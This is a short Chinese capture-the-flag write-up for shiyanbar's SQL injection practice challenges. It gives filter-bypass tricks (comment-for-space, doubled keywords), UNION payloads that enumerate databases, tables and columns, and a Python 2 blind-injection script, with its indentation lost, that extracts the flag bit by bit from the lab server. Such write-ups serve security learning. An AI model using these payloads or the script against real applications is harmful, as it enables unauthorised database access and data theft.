简单的SQL注入1,2
知识点:
空格用/**/或者()代替
可以把关键字重复一遍防止字符过滤
获取数据库名:
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
获取数据库表名:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
获取所有列名:
1' unionunion selectselect column_name fromfrom information_schema.columns wherewhere '1'='1
最终注入1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/1='1
简单的SQL注入3
使用盲注一个一个遍历出flag的值
#!/usr/bin/python
#coding=utf-8
#Author = One
import requests
def main():
n = 0
binary = ""
flag = ""
for i in range(1,1000):
for j in range(8):
url = "http://ctf5.shiyanbar.com/web/index_3.php?id=1' and 1=if((ascii(substring((select flag from flag),"+str(i)+",1))%26"+str(2**j)+")="+str(2**j)+",1,0) %23"
request = requests.get(url)
if(request.text.find('Hello!') != -1):
binary = '1'+binary
n = 0
else:
binary = '0'+binary
n += 1
print chr(int(binary,2)),
flag += chr(int(binary,2))
binary = ""
if(n >= 8):
print "\n"+flag
break
if __name__ == '__main__':
main()
